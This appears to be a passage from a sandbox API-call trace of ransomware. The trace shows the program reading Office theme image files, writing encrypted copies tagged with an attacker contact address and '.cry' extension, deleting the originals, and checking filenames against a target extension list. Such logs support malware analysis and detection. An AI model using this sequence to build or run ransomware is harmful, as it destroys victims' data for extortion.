(lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\PREVIEW.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\concrete\\preview.gif.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0044.893] GetLastError () returned 0x0 [0044.893] ReadFile (in: hFile=0x190, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x507, lpOverlapped=0x0) returned 1 [0044.904] WriteFile (in: hFile=0x184, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0x510, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0x510, lpOverlapped=0x0) returned 1 [0044.905] ReadFile (in: hFile=0x190, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x0, lpOverlapped=0x0) returned 1 [0044.905] WriteFile (in: hFile=0x184, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0xea, lpOverlapped=0x0) returned 1 [0044.905] SetEndOfFile (hFile=0x184) returned 1 [0044.905] CloseHandle (hObject=0x184) returned 1 [0044.906] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.906] SetEndOfFile (hFile=0x190) returned 1 [0044.906] CloseHandle (hObject=0x190) returned 1 [0044.906] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\PREVIEW.GIF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0044.907] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\concrete\\preview.gif")) returned 1 [0044.907] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\PREVIEW.GIF") returned 76 [0044.907] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\PREVIEW.GIF") returned 76 [0044.907] lstrlenW (lpString=".doc") returned 4 [0044.907] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0044.907] lstrlenW (lpString=".docx") returned 5 [0044.907] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0044.907] lstrlenW (lpString=".pdf") returned 4 [0044.907] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0044.907] lstrlenW (lpString=".xls") returned 4 [0044.907] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0044.907] lstrlenW (lpString=".xlsx") returned 5 [0044.907] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0044.907] lstrlenW (lpString=".ppt") returned 4 [0044.907] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0044.907] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\PREVIEW.GIF") returned 76 [0044.907] lstrlenW (lpString=".zip") returned 4 [0044.907] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0044.907] lstrlenW (lpString=".rar") returned 4 [0044.907] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0044.907] lstrlenW (lpString=".bz2") returned 4 [0044.907] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0044.907] lstrlenW (lpString=".7z") returned 3 [0044.908] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0044.908] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\PREVIEW.GIF") returned 76 [0044.908] lstrlenW (lpString=".dbf") returned 4 [0044.908] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0044.908] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\PREVIEW.GIF") returned 76 [0044.908] lstrlenW (lpString=".1cd") returned 4 [0044.908] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0044.908] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\PREVIEW.GIF") returned 76 [0044.908] lstrlenW (lpString=".jpg") returned 4 [0044.908] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0044.908] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\PREVIEW.GIF") returned 76 [0044.908] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\PREVIEW.GIF") returned 76 [0044.908] lstrlenW (lpString=".doc") returned 4 [0044.908] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0044.908] lstrlenW (lpString=".docx") returned 5 [0044.908] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0044.908] lstrlenW (lpString=".pdf") returned 4 [0044.908] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0044.908] lstrlenW (lpString=".xls") returned 4 [0044.908] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0044.908] lstrlenW (lpString=".xlsx") returned 5 [0044.908] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0044.908] lstrlenW (lpString=".ppt") returned 4 [0044.908] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0044.908] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\PREVIEW.GIF") returned 76 [0044.908] lstrlenW (lpString=".zip") returned 4 [0044.908] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0044.908] lstrlenW (lpString=".rar") returned 4 [0044.908] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0044.908] lstrlenW (lpString=".bz2") returned 4 [0044.908] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0044.908] lstrlenW (lpString=".7z") returned 3 [0044.908] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0044.908] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\PREVIEW.GIF") returned 76 [0044.908] lstrlenW (lpString=".dbf") returned 4 [0044.908] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0044.908] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\PREVIEW.GIF") returned 76 [0044.909] lstrlenW (lpString=".1cd") returned 4 [0044.909] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0044.909] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\PREVIEW.GIF") returned 76 [0044.909] lstrlenW (lpString=".jpg") returned 4 [0044.909] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0044.909] lstrcmpiW (lpString1=".PNG", lpString2=".cry") returned 1 [0044.909] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0044.909] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\concrete\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0044.909] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x225ff1c | out: lpFileSize=0x225ff1c*=28595) returned 1 [0044.909] CloseHandle (hObject=0x190) returned 1 [0044.909] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\concrete\\thmbnail.png")) returned 0x20 [0044.910] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\THMBNAIL.PNG.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\concrete\\thmbnail.png.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0044.910] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\concrete\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0044.910] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.910] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.910] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\THMBNAIL.PNG.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\concrete\\thmbnail.png.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0044.910] GetLastError () returned 0x0 [0044.910] ReadFile (in: hFile=0x190, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x6fb3, lpOverlapped=0x0) returned 1 [0044.912] WriteFile (in: hFile=0x184, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0x6fc0, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0x6fc0, lpOverlapped=0x0) returned 1 [0044.913] ReadFile (in: hFile=0x190, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x0, lpOverlapped=0x0) returned 1 [0044.913] WriteFile (in: hFile=0x184, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0xec, lpOverlapped=0x0) returned 1 [0044.913] SetEndOfFile (hFile=0x184) returned 1 [0044.913] CloseHandle (hObject=0x184) returned 1 [0044.913] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.913] SetEndOfFile (hFile=0x190) returned 1 [0044.914] CloseHandle (hObject=0x190) returned 1 [0044.914] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\THMBNAIL.PNG.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0044.914] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\concrete\\thmbnail.png")) returned 1 [0044.914] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\THMBNAIL.PNG") returned 77 [0044.914] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\THMBNAIL.PNG") returned 77 [0044.914] lstrlenW (lpString=".doc") returned 4 [0044.914] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0044.914] lstrlenW (lpString=".docx") returned 5 [0044.914] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0044.915] lstrlenW (lpString=".pdf") returned 4 [0044.915] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0044.915] lstrlenW (lpString=".xls") returned 4 [0044.915] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0044.915] lstrlenW (lpString=".xlsx") returned 5 [0044.915] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0044.915] lstrlenW (lpString=".ppt") returned 4 [0044.915] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0044.915] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\THMBNAIL.PNG") returned 77 [0044.915] lstrlenW (lpString=".zip") returned 4 [0044.915] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0044.915] lstrlenW (lpString=".rar") returned 4 [0044.915] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0044.915] lstrlenW (lpString=".bz2") returned 4 [0044.915] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0044.915] lstrlenW (lpString=".7z") returned 3 [0044.915] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0044.915] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\THMBNAIL.PNG") returned 77 [0044.915] lstrlenW (lpString=".dbf") returned 4 [0044.915] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0044.915] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\THMBNAIL.PNG") returned 77 [0044.915] lstrlenW (lpString=".1cd") returned 4 [0044.915] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0044.915] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\THMBNAIL.PNG") returned 77 [0044.915] lstrlenW (lpString=".jpg") returned 4 [0044.915] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0044.915] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\THMBNAIL.PNG") returned 77 [0044.915] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\THMBNAIL.PNG") returned 77 [0044.915] lstrlenW (lpString=".doc") returned 4 [0044.915] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0044.915] lstrlenW (lpString=".docx") returned 5 [0044.915] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0044.915] lstrlenW (lpString=".pdf") returned 4 [0044.915] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0044.915] lstrlenW (lpString=".xls") returned 4 [0044.915] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0044.915] lstrlenW (lpString=".xlsx") returned 5 [0044.915] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0044.915] lstrlenW (lpString=".ppt") returned 4 [0044.916] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0044.916] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\THMBNAIL.PNG") returned 77 [0044.916] lstrlenW (lpString=".zip") returned 4 [0044.916] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0044.916] lstrlenW (lpString=".rar") returned 4 [0044.916] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0044.916] lstrlenW (lpString=".bz2") returned 4 [0044.916] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0044.916] lstrlenW (lpString=".7z") returned 3 [0044.916] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0044.916] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\THMBNAIL.PNG") returned 77 [0044.916] lstrlenW (lpString=".dbf") returned 4 [0044.916] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0044.916] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\THMBNAIL.PNG") returned 77 [0044.916] lstrlenW (lpString=".1cd") returned 4 [0044.916] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0044.916] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\THMBNAIL.PNG") returned 77 [0044.916] lstrlenW (lpString=".jpg") returned 4 [0044.916] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0044.916] lstrcmpiW (lpString1=".GIF", lpString2=".cry") returned 1 [0044.916] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0044.916] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\deepblue\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0044.916] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x225ff1c | out: lpFileSize=0x225ff1c*=3957) returned 1 [0044.916] CloseHandle (hObject=0x190) returned 1 [0044.917] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\deepblue\\preview.gif")) returned 0x20 [0044.917] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\deepblue\\preview.gif.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0044.917] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\deepblue\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0044.917] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.917] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.917] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\deepblue\\preview.gif.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0045.031] GetLastError () returned 0x0 [0045.031] ReadFile (in: hFile=0x190, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0xf75, lpOverlapped=0x0) returned 1 [0045.043] WriteFile (in: hFile=0x184, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0xf80, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0xf80, lpOverlapped=0x0) returned 1 [0045.043] ReadFile (in: hFile=0x190, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x0, lpOverlapped=0x0) returned 1 [0045.043] WriteFile (in: hFile=0x184, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0xea, lpOverlapped=0x0) returned 1 [0045.044] SetEndOfFile (hFile=0x184) returned 1 [0045.044] CloseHandle (hObject=0x184) returned 1 [0045.044] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.044] SetEndOfFile (hFile=0x190) returned 1 [0045.045] CloseHandle (hObject=0x190) returned 1 [0045.045] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0045.045] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\deepblue\\preview.gif")) returned 1 [0045.054] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF") returned 76 [0045.054] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF") returned 76 [0045.054] lstrlenW (lpString=".doc") returned 4 [0045.054] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0045.054] lstrlenW (lpString=".docx") returned 5 [0045.054] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0045.054] lstrlenW (lpString=".pdf") returned 4 [0045.054] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0045.054] lstrlenW (lpString=".xls") returned 4 [0045.054] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0045.054] lstrlenW (lpString=".xlsx") returned 5 [0045.054] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0045.054] lstrlenW (lpString=".ppt") returned 4 [0045.054] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0045.054] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF") returned 76 [0045.054] lstrlenW (lpString=".zip") returned 4 [0045.054] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0045.054] lstrlenW (lpString=".rar") returned 4 [0045.054] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0045.054] lstrlenW (lpString=".bz2") returned 4 [0045.054] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0045.054] lstrlenW (lpString=".7z") returned 3 [0045.054] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0045.054] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF") returned 76 [0045.054] lstrlenW (lpString=".dbf") returned 4 [0045.054] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0045.054] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF") returned 76 [0045.054] lstrlenW (lpString=".1cd") returned 4 [0045.055] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0045.055] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF") returned 76 [0045.055] lstrlenW (lpString=".jpg") returned 4 [0045.055] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0045.055] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF") returned 76 [0045.055] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF") returned 76 [0045.055] lstrlenW (lpString=".doc") returned 4 [0045.055] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0045.055] lstrlenW (lpString=".docx") returned 5 [0045.055] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0045.055] lstrlenW (lpString=".pdf") returned 4 [0045.055] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0045.055] lstrlenW (lpString=".xls") returned 4 [0045.055] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0045.055] lstrlenW (lpString=".xlsx") returned 5 [0045.055] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0045.055] lstrlenW (lpString=".ppt") returned 4 [0045.055] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0045.055] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF") returned 76 [0045.055] lstrlenW (lpString=".zip") returned 4 [0045.055] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0045.055] lstrlenW (lpString=".rar") returned 4 [0045.055] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0045.055] lstrlenW (lpString=".bz2") returned 4 [0045.055] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0045.055] lstrlenW (lpString=".7z") returned 3 [0045.055] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0045.055] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF") returned 76 [0045.055] lstrlenW (lpString=".dbf") returned 4 [0045.055] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0045.055] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF") returned 76 [0045.055] lstrlenW (lpString=".1cd") returned 4 [0045.055] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0045.055] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF") returned 76 [0045.055] lstrlenW (lpString=".jpg") returned 4 [0045.055] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0045.056] lstrcmpiW (lpString1=".PNG", lpString2=".cry") returned 1 [0045.056] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0045.056] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\evrgreen\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0045.056] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x225ff1c | out: lpFileSize=0x225ff1c*=32433) returned 1 [0045.056] CloseHandle (hObject=0x190) returned 1 [0045.056] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\evrgreen\\thmbnail.png")) returned 0x20 [0045.056] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\THMBNAIL.PNG.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\evrgreen\\thmbnail.png.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0045.056] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\evrgreen\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0045.056] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.056] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 